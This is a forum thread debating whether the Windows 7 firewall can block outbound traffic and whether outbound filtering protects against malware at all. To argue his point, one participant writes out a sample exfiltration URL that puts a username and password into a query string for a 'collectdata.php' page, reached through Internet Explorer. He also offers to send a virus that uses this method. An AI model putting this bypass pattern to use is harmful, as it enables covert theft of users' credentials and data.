Windows 7 Firewall

Is it possible to block all connections (outbound especially) apart from the programs currently in the firewalls exception list ?

Seems like the firewall only checks in inbound ones.

What i need is, basically when you run a program for the first time and you get an allow/cancel popup, if i choose cancel then it should block both inbound and outbound connections and not only the inbound ones.

 

well, you can change the default to block outbound connections in the firewall dialog (3 times, for domain, home, and public networks).

no clue how it behaves exactly, then (a.k.a. if a popup pops.. up).

maybe group policies give more ideas?

 

Yea tried that but it doesnt work as anticipated, basically when i switch it to block it instantly blocks everything regardless if that application is the list with applications to exclude.

The only workaround i found was to create a new policy for every app/game in order to bypass that option but its gonna take a while to do it for every single thing From what im reading around, its not possible to bind outbound connections on the allow/cancel buttons (popup) since Microsoft wanted to keep the firewall simple hence not implementing that feature

 

blocking outbound stuff by default isn't the best thing for the default-shipping os setting anyways. imagine suddenly no tool being able to find updates, programs that need activation not being able to do so anymore. suddenly a lot of people could very easily use non-legal software, as the software can't ever communicate to the web to check it's validity.

but yeah, would be nice to be able to set it somehow..

 

Zone Alarm Free?

 

Nah i use avira suite for that, but i wanted to give windows firewall another try since i totally forgot why i didnt like it in the first place Now i remembered

 

"Assuming Microsoft implemented an outbound firewall, the easy way for malware writers to work around it is to have an executable called iexplore.exe (or any other common program) send outbound on port 80. How is the home user supposed to know to block that when it pops up?"

interestingly, i just saw some days ago some virus doing exactly that (some iexlpore.exe popping up every some seconds in the taskmanager, if the actualisation rate was set high enough)

 

and, to read how microsoft thinks about it:

Are default outbound filters really necessary in Vista’s firewall?

most important part: the term "Security Theater". drama to sell stuff.

 

Too complicated or not too transparent as how Windows Firewall works on outbound blocking. Your best bet is a 3rd party firewall if you are concerned about outgoing requests.

cheers ...

 

which you shouldn't be.

that works always, if you don't have a proxy like in companies.

this is too easy for any malware coder to develop, and goes trough ALL your outbound things.

 

Try Windows 7 Firewall Control.

http://www.sphinx-soft.com/Vista/index.html

W7FC sits atop the Windows Firewall as a kind of features extension; it is not a third party firewall. With each new internet connection/program you will get a pop-up, similar to ZoneAlarm, in which you can choose to Block Outgoing connections, once or "forever" for any new internet connection/program. You can choose to Allow Outgoing once or "forever" as well. You can choose to apply your rule to just Incoming or Outgoing. A new rule will be added to Windows Firewall with your selection.

The free version works well (it's what I've used since the Vista RC days) and the paid version allows you to select default actions/zones. You are also able to further customize the pop-up with additional program features in the paid version.

--L.

 

That looks interesting, too bad it costs 30 bucks for the plus edition. The free one looks too simple.

 

nobody even thinking about my posts that outbound is 0 security gain?

 

There are other reasons to block that have nothing to do with security. What if I don't want a program to phone home?

 

then you can still block it manually.

what reasons exist for that? besides the obvious, questionable one i stated above?

 

Edit: *** just ignore this post*** I have never used windows firewall, so i shouldn't comment on it.

 

jup, first read up on it and how and why it's designed that way, and why it's good that way. instead of just "it's microsoft, it's the default, i need something better, different". just try it.

 

Couldn't agree more with you there. As a general rule, people fussing about how they "need" a third-party firewall to amend the "shortcomings" of Windows' built-in one simply don't know what they are talking about. Third-party firewalls are usually a complete and utter waste of system resources, at the very least, and sometimes a waste of money, too.

Simply put, outbound connection control provides exactly zero protection against malicious code, and there is usually no good reason to worry about non-malicious software opening outbound connections, except in, hmm, "special" scenarios...

 

and zero protection against spreading malicious code, which often gets stated.

they just use existing ways to get to the web, see my code example: start internet explorer, connect to the page of choice with a nice url containing all information. simple, quick to set up, and it works.

and i've seen a virus/trojaner/spywarething (i don't care how they get all called) that did exactly that, just a week ago.

 

All firewalls available to the consumer market(not including the ones large companies and banks use) are more or less on the same level of "protection" so it's just a throw in the air in the overall sense as to why to get one or the other. In actuality, if firewall a can't stop a given threat(spyware, hacker etc.), chances are firewall b can't do much either unless we're in one of those rare situational cases where there's structural or protocol differences.

Random question but is the Windows 7 built in firewall different from the Vista one of are they the same in essence? I know the Vista one is different than the XP one so I was just wondering.

 

it is a continuation of the one of vista. it has a new layout to configure, and i think the option to set it up for domains, homenetworks, publicnetworks independently is new.

but it's a mere evolution in how to configure, and when what rules apply. the technology behind is still the same.

 

Bah, went to sleep and already found one extra page to read on, thanks for the responses.

Dave, i can think one reason at least why outbound connections are important, /points keyloggers, if something/somehow anything like that get installed on your system then outbounds connections are kinda critical to control dont you think ?

That and the fact that it gives you more control in general as to whats happening in your computer since you have another layer of defence to worry about (whats coming out of your computer).

As you already know, you cant configure the firewall to block everything except the programs in the exception list since exception list doesnt work for outbound connections, so doing it manually (the way you are suggesting) will take a lot of time, not to mention that there are programs, msn for eg that need two processes to access the internet so its not as simple as putting the main .exe file in the policy.

So, i was checking if theres actually an easier way of doing that since 3rd party software can already do that job. No reason to spend X time doing something which another firewall can do it X times faster...

edit: ps: ill repeat the same thing here doing it manually is not an option, go into policies and block a program manually and tell me how many "seconds" it takes for an experienced user to do that and then tell me how much faster a single click is vs that

 

well, the rule is simple: if your system is compromised, and your system has one way (typically iexplore, port 80) to communicate outwards, there is NO outbound tool helping.

so caring about outbound firewall settings is just completely useless. it gives you ZERO security. f.e. if you have a keylogger installed. zero security.


edit: and i could send you a virus doing exactly that. your outbound firewall would be of ZERO help. it could keylog, send out your files, your passwords, your private data. it could download and install new stuff, etc etc.

the outbound firewall could NOT stop it doing so.

it's an exe called server.exe (with a smiley icon) that regularly for a split second opens iexplore.exe with a path attached to some domain, to which it tries to communicate with, then.

so don't even try to bother about outbound firewalls. they already get compromised daily without being ON. and the reason? because it's actually more easy to do it over the default port with existing apps, like iexplore.

 

Im assuming you know that firewalls (proper ones at least) do package sniffing ? Hence are not so stupid to fall for the filename/port trick you are suggesting

But i am willing to give it a try, find me something that can do that, its going to be an interesting exploit from my POV

 

oh yeah, sure they do. so they do react if internet explorer (not something with that filename, but c:\program files\internet explorer\iexlore.exe, the real one, certified and signed my microsoft corporation) starts up and opens a webpage?

well, that would be a bad firewall then, sir.

and no, packet sniffing imho belongs to higher levels, like virescanners (avast did that i think), or even the internet explorer itself, which has suspicious pages blacklisted.

 

For eg, Avira, since thats the one i use, there is an option when you allow something "Allow privileged", if you do not tick that option then the application is allowed to go into the internet but still filtered by the rules. If you tick it then it can freely do whatever it wants

 

well, and those rules would prevent internet explorer (which you would sure not have privileged, now, would you?) to access davepermen.net/collectdata.php?username=CooLMinE&Password=Lalalalala ?

because i can tell you something? it wouldn't.


edit: and no the link obviously doesn't work. but does your firewall prevent you to browse to such links?



btw, what i can see now is that you don't "get firewalls". they are a low level construct, like a router, allowing connections trough ports. everything above it is not job of the firewall itself. of some security suite, maybe. but it's not the job of the firewall.

 

I get an error 404 error with that page.

 

and, in other news: if you get some evil software that avira doesn't detect on your system, then chance is VERY HIGH, that it doesn't know the page it sends data to is evil, too.

so no, it won't be blocked. it might, but the chance is so terribly small, your chance to die because you got hit by a toilet seat from the MIR is bigger..

obviously a fake url.. read the url exactly..

 

Ah sorry about that read it a bit too fast, yea avira has a "service" (feature) to scan urls for "bad coding" so i guess it should prevent me from entering that url if theres something odd about it.

Dont confuse what i say with higher level hacking though, of course if you want to hack something you can, nothing is 100% secure. Im just trying to do the best i can with the "best" tools i can find, since all tools have their cons and pros.

I know that most firewalls are low level firewall including the router ones, so im sure you can see why im looking into outbound connections

But im really interesting in that name/port exploit, cause if it works then its a major flaw in the systems.

 

no you're not looking into outbound connections then, as this is a lowlevel construct that completely FAILS.

what you look is simply full data control on what you do inwards and outwards. this has nothing to do with a firewall. a firewall never cares about data, it shall be completely non-discriminating.

 

Of course it cares about data, hence why its installing the driver into your connection.

Even corporate firewalls get penetrated easily, the point is that in some cases they are better than X. Even with sniffing all packages received for headers and patterns you can still inject packages with false information and forward them.

Firewall should care about data, since packages received = data, and the firewalls job is to control/filter those packages

 

no, firewall is about ports, opening and closing them. that way it's 100% clear what it does. there is no "if it's updated", or something.

that is the job of the vire scanner. how it does it is unimportant. it should just detect everything (which it can't). or malware scanner, or evilstuffscanner, what ever you wanna call it. if it does it by packet sniffing, or by by signing-executables to make sure they're proper, or what ever, that's the choise of the vendor.

but the firewall is a simple black/white list of ports/executables. nothing more.

 

Yea i guess you can put it that way, i was talking for firewalls (software) that companies sell today

A firewall as a word yea its job will be what you said, but todays firewalls (since they are labelled that way, software ones at least) do more than just ports.

 

and that is stupid. they just name their stuff to sound fancy, and then call it better as it's just not the same. i can call a ferrari a fast smart. but it still isn't a smart (try to park it into the same small spot).

those security suites are all sort of things. but a firewall (like uac) is a simple, one trick pony. the advantage: it does that one trick perfectly well (like math. 2+2=4, always.. not a "i like that green more, it's more.. you know.. pretty, don't you think, too?")

it's a hard, cold, clear defined boundary. no way trough it, only around it.

anything above that, more high level, about scanning, detecting, and such, is never to trust 100%. hard defined boundaries are trustable. they are not the only thing that you can rely on, but they are something you can then rely on 100%.

btw..

cool COOL-F574B2AB5F

 

Yeap thats the VM machine without protection on it, seems to be refusing to run on Win7 though, PM'ed you